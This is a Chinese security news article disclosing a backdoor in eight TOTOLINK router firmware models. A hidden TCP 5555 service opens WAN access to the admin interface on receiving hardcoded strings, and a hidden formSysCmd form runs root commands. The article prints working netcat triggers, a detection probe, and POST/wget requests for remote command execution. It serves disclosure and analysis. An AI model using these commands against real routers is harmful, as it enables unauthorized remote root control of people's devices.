占据韩国80%市场的TOTOLINK路由器被曝存在后门,影响5万路由器

发表于:2015-07-19 10:00:00 来源: 黑客与极客 阅读数(0人)

TOTOLINK路由器

 

TOTOLINK路由器在韩国市场占有率达82.3%。由深圳众唐科技公司负责产品的研发、制造。


漏洞简述


通过分析最近一次的固件以及在真实路由器上进行测试后,研究人员发现8款TOTOLink产品中存在后门。


注:固件来自totolink.net以及totolink.cn


A850R-V1 : 最新固件 TOTOLINK-A850R-V1.0.1-B20150707.1612.web
F1-V2 : 最新固件 F1-V2.1.1-B20150708.1646.web
F2-V1 : 最新固件 F2-V2.1.0-B20150320.1611.web
N150RT-V2 : 最新固件 TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
N151RT-V2 : 最新固件 TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
N300RH-V2 : 最新固件 TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
N300RH-V3 : 最新固件 TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
N300RT-V2 : 最新固件 TOTOLINK-N300RT-V2.1.1-B20150708.1613.web

通过向WAN IP发送一个精心构造的请求,攻击者可以在网上打开HTTP远程管理界面。接着攻击者在HTTP原创管理界面中通过hidden/boafrm/formSysCmd形式使用远程代码执行,进而绕过认证系统。


初步估计大约有5万路由器受到后门影响。


后门细节


当路由器启动后会int.d脚本会执行/bin/skt文件


cat etc/init.d/rcS
[...]
# start web server
boa
skt&

skt是一个MIPS架构文件,其参数:


server: ./skt
client: ./skt host cmd

使用模拟器,该二进制文件可以兼容 x86_64机器: sudo chroot . ./qemu-mips-static ./bin/skt


单独使用skt不带任何参数,将会启用一个端口为5555的TCP保护程序,担当回显服务器的角色。使用带参数的skt将通过5555端口向目标IP发送一个包含命令的TCP包。


skt的主要功能:


TcpClient是一个简单的TCP客户端
TcpServer就像一个回显服务器

TcpClient:将发送一个包含hel,xasf, oki,xasf 或者 bye,xasf的TCP包,这取决于使用的参数(1,2,3)


TcpServer:用来监听tcp/5555的回显服务器并比较用户提供的硬编码字符串("hel,xasf", "oki,xasf").


sub_400B50函数:


sub_400B50函数

 

sub_400B50函数的伪代码:


int32_t sub_400B50(int32_t a1, char *str, int32_t a3, int32_t a4, int32_t a5) {
    if (strcmp(str, "hel,xasf") == 0) {
        system("iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");
    } else {
        if (strcmp(str, "oki,xasf") == 0) {
            system("iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");
        }
    }
    [...]
}

该函数比较用户指定的字符串,2个硬编码字符串执行system()。


分析运行在TOTOLINK设备上的二进制文件,显示服务器通过静默执行system()响应命令


1.通过将 "hel,xasf"发送给设备,设备将执行:


iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

这将在eth1接口(默认的WAN接口)80端口打开HTTP远程管理界面


2.通过将"oki,xasf"发送给设备,设备将执行:


iptables -D INPUT -p tcp –dport 80 -i eth1 -j ACCEPT


这是关闭HTTP原创管理界面


3.通过发送"bye,xasf"给设备,设备什么都不会做。


后门中的iptables命令都是"eth1"的硬编码,只有使用DHCP以及静态IP连接的设备才会受到影响,因为WAN IP依赖于eth1设备,而对于PPPoE连接没有任何影响


totolink# ifconfig
ppp0      Link encap:Point-to-Point Protocol
          inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1
          RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:64
          RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)

攻击者可以使用简单的netcat命令来测试后门:


1.打开HTTP远程管理界面


echo -ne "hel,xasf" | nc  5555

关闭HTTP远程管理界面


echo -ne "oki,xasf" | nc  5555

3.检测含漏洞路由器

echo -ne "GET / HTTP/1.1" | nc  5555
if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router.

通过后门打开HTTP远程管理界面:


HTTP远程管理界面

 

路由器管理页面中的远程命令执行漏洞


在最新固件中一个隐藏窗口允许攻击者以root权限执行命令:


POST /boafrm/formSysCmd HTTP/1.1
sysCmd=&apply=Apply&msg=

攻击者可以使用wget在远程设备中执行命令:


wget --post-data='sysCmd=&apply=Apply&msg=' http://ip//boafrm/formSysCmd

例如,向管理界面发送该HTTP请求,可以远程重启设备:


POST /boafrm/formSysCmd HTTP/1.1
sysCmd=reboot&apply=Apply&msg=

下面的wget命令和上面的命令类似:


wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd

相关新闻

大家都在学

课程详情

入侵检测与入侵防御

课程详情

IDA教程系列

课程详情

防火墙技术